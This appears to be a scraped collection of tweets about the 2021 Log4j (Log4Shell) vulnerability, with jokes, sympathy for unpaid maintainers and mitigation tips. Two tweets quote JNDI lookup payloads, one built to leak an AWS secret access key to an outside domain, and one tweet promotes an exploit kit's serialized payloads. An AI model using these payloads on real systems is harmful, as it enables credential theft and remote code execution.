Remote code exec is so 2014. Have this container escape and privilege escalation, instead
📢 On June 23rd, I will be presenting in @tweakers Summit 2022: How did the Log4j crew survive Log4shell? tweakers.net/partners/devsu… Game on! 🎮
Volkan Yazıcı (@yazicivo) Tue, 29 Mar 2022 07:06 +0000
Since #Log4j you've heard how OSS vulns impact most orgs, how OSS is underfunded & we need to do more to help, but did you know OSS security has improved drastically in the last 4 years? In 2017, 35% of OSS libs used had a known flaw. In 2022 it's < 10% veracode.com/state-of-softw…
Chris Wysopal (@WeldPond) Wed, 09 Feb 2022 19:36 GMT
One More Log4j Security Hole Before the New Year via @thenewstack & @sjvn You didn't really want to go to that New Year's Party anyway, did you? It's time to patch vulnerable #log4j2 libraries one more time. #Security
Steven J. Vaughan-Nichols (@sjvn) Thu, 30 Dec 2021 19:10 GMT
log4j is that annoying sibling that won't stop poking you no matter how much you protest
Molly Struve 🦄 (@molly_struve) Tue, 28 Dec 2021 16:53 GMT
I never realized how lucky I was to not have to deal with log4j until I tried to make a joke about it to my boyfriend over the holidays and he looked like he was about to cry 😟
Serra Abak (@serraabak) Tue, 28 Dec 2021 16:00 GMT
the most important thing about the log4j incident is that it’s clear and incontrovertible evidence in support of whatever beliefs i already have about software development
henry 🌘 (@hdevalence) Mon, 13 Dec 2021 17:29 GMT
imagining a timeline where the log4j maintainers replied to the vuln disclosure with "ok, feel free to raise a PR"
this is *well* worth the read dev.to/yawaramin/the-…
cje (@caseyjohnellis) Thu, 23 Dec 2021 09:06 GMT
Matt "jira delenda est" Olson (@arachnocapital2) Sat, 25 Dec 2021 01:39 GMT
Ah, nice to be on holiday, at Christmas, where I can forget about what happ…
Michael Maclean (@mgdm) Sat, 25 Dec 2021 13:11 GMT
lol
Rufo (@hilare_belloc) Thu, 23 Dec 2021 21:14 GMT
Good news: Log4j is the only library you use that’s been trivially vulnerable for about a decade.
haroon meer (@haroonmeer) Mon, 20 Dec 2021 11:12 GMT
Reproduced. @ProtonMail #log4jRCE
@ProtonMail ProtonMail is logging my email content?
削·格瓦斯 (@aftergreatest) Mon, 13 Dec 2021 07:19 GMT
ツキ🌙 (@iimtsuki) Mon, 13 Dec 2021 12:20 GMT
If the past week has taught us anything, it's that people would rather depend on software they don't pay for, while complaining about it and its maintainers (who are also not getting paid!)
Marit van Dijk (@MaritvanDijk77) Fri, 17 Dec 2021 06:03 GMT
There is going to be continued focus on log4j vulns for some time. It is very important to know not every new vulnerability is equal, or likely to be exploited.
Kevin Beaumont (@GossiTheDog) Sun, 19 Dec 2021 00:30 GMT
Important to know the vulnerability hype train is in full force for Log4j at the moment. A reminder that log4j is maintained by a small group of volunteers, up against a multi-billion-dollar security industry and news media that profit from rewriting what they say to sound scary.
Kevin Beaumont (@GossiTheDog) Sun, 19 Dec 2021 00:25 GMT
the log4j “december to remember” event this year features 0% financing on tech debt 😮
Patrick Cable (@patcable) Fri, 17 Dec 2021 15:40 GMT
String interpolation in log messages has been removed in Log4j 2.16.0, so one would have to use this pattern explicitly in the Log4j configuration file. In other words, an attacker would need to be able to overwrite the Log4j configuration to exploit this.
(╯°□°)╯︵ ┻━┻ (@joschi83) Fri, 17 Dec 2021 08:29 GMT
AWS has published a DaemonSet to help mitigate the impact of #Log4j2 CVE-2021-44228 on #Kubernetes clusters until Java applications can be patched. See more github.com/aws-samples/ku…
Nate Taber (@nctaber) Wed, 15 Dec 2021 22:13 GMT
A story in three parts 😶 #log4j
Cas van Cooten (@chvancooten) Fri, 10 Dec 2021 16:19 GMT
I don't care if #Log4J is supposed to be pronounced as Log-Forge... ...I'm still gonna pronounce it as Log-Four-Jay. Same way that Nginx is not Engine-Ex, it's En-Ginx (G pronounced like the G in gif).
Tinker (@TinkerSec) Tue, 14 Dec 2021 14:18 GMT
but it's not log4j's responsibility to fix this in a timely fashion; they didn't make any promises to any big corps about SLAs or any shit like that, and if there are **consequences** for those corps, that is FINE. It might suck, but that's not the devs' responsibility.
Beka Valentine (@beka_valentine) Sun, 12 Dec 2021 20:55 GMT
Just added support for LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* Java version as long as the classes used in the serialized payload are in the application classpath. Do not rely on your Java version being up-to-date and update your log4j ASAP!
Márcio Almeida (@marcioalm) Mon, 13 Dec 2021 11:54 GMT
To everyone astonished at how widespread Java usage really is: what you've just seen is just the stuff using Log4J2. ;)
Lars Rosenquist (@larsrosenquist) Sun, 12 Dec 2021 11:24 GMT
don't forget you can get those sweet environment variables ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}
DilDog (@dildog) Sat, 11 Dec 2021 21:48 GMT
A whole lot of engineers worked all weekend and deserve the week off. Friendly reminder that you should give it to them.
emily freeman (@editingemily) Mon, 13 Dec 2021 06:06 GMT
Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
Matthew Prince 🌥 (@eastdakota) Sat, 11 Dec 2021 22:47 GMT
Been thinking about the maintainers of log4j2 a ton this weekend. I'm so thankful for open source. While I get to maintain projects with support from my employer, most do this entirely with spare time. Maintainers deserve our thanks (and sponsorships!) for their work 🤗🙏
Jeff Hollan (@jeffhollan) Sun, 12 Dec 2021 17:16 GMT
This Christmas we're burning Yule Log4js
Richard Westmoreland (@RSWestmoreland) Fri, 10 Dec 2021 21:18 GMT
We don’t need everyone to upgrade log4j, just enough for herd immunity to take over
Ricky (@rickhanlonii) Sun, 12 Dec 2021 16:55 GMT
Log4j recap - two random unpaid folk maintain the code - a random requested the vuln/feature in 2013 - major IT and security vendors rely on that code - problem was publicised by teens in Minecraft video game - scope of problem still unclear days later
Kevin Beaumont (@GossiTheDog) Sun, 12 Dec 2021 01:14 GMT
My #log4j status/tracking page is a little rough in spots, but the list of affected, claimed unaffected, and not-sure-yet products is getting the full undue diligence: techsolvency.com/story-so-far/c…
Royce Williams (@TychoTithonus) Sat, 11 Dec 2021 06:21 GMT
If you have a #Maven parent POM for your org or project, here's an enforcer rule to put into it which will ban any current or future usage of vulnerable #log4j2 versions. gist.github.com/gunnarmorling/…
Gunnar Morling 🌍 (@gunnarmorling) Sat, 11 Dec 2021 09:42 GMT
People making fun of log4j as if they never slammed some bash to parse out database credentials for reasons.
Smasher of DBs. First of her name. (@dbsmasher) Sat, 11 Dec 2021 19:19 GMT
This week did not show us weakness in Log4J, Java, or open source. It showed us their relevance and resilience. My 🤘🏻 to the folks keeping us safe with timely workarounds, fixes, and communications. This was a masterclass in global incident response.
Andrew Lee Rubinger (@ALRubinger) Sun, 12 Dec 2021 07:01 GMT
from @BlackHatEvents USA 2016: A Journey From #JNDI/LDAP Manipulation to Remote Code Execution Dream Land by @pwntester and @olekmirosh blackhat.com/docs/us-16/mat… now the exploit vector presented in 2016 is the #log4jRCE. attached slide #11 from the presentation below. :)
an0n (@an0n_r0) Sat, 11 Dec 2021 12:23 GMT
we’re calling this thing the Yule Log4j, right? cuz in the dark of winter we’ve gathered together to watch it burn?
gemily son of glóin (@themortalemily) Sat, 11 Dec 2021 18:23 GMT
This is a “vaccination” for the log4j vulnerability. Given a vulnerable piece of software, it exploits the log4j vulnerability, just to install a new piece of code that prevents exploiting it in the future. Ethical? github.com/Cybereason/Log…
Daniel Feldman (@d_feldman) Sat, 11 Dec 2021 16:21 GMT
Googling to learn more about the #Log4J vuln and google helpfully let me know that log(4) J is 0.602059991 joules
Edwin (@ed___wins) Fri, 10 Dec 2021 23:17 GMT
No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF "Project Management Committee"... AND NO ONE IS PAYING THEM? apache.org/dev/pmc.html Open Source needs to grow the hell up. Yesterday.
Log4j maintainers have been working sleeplessly on mitigation measures: fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. twitter.com/shipilev/statu…
Volkan Yazıcı (@yazicivo) Fri, 10 Dec 2021 16:55 GMT
Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) Fri, 10 Dec 2021 22:58 GMT
Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them.
If you're running a server with #Log4J, please add the following JVM argument to your command line immediately to protect against a 0-day exploit. -Dlog4j2.formatMsgNoLookups=true lnkd.in/gHmEFJ9w #Java #Security #Infosec
Bruno Borges (@brunoborges) Fri, 10 Dec 2021 06:07 GMT
Aleksey Shipilëv (@shipilev) Fri, 10 Dec 2021 15:26 GMT
Log4j maintainers have been working sleeplessly on mitigation measures: fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.
Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them. twitter.com/brunoborges/st…
Aleksey Shipilëv (@shipilev) Fri, 10 Dec 2021 15:26 GMT
Volkan Yazıcı (@yazicivo) Fri, 10 Dec 2021 16:55 GMT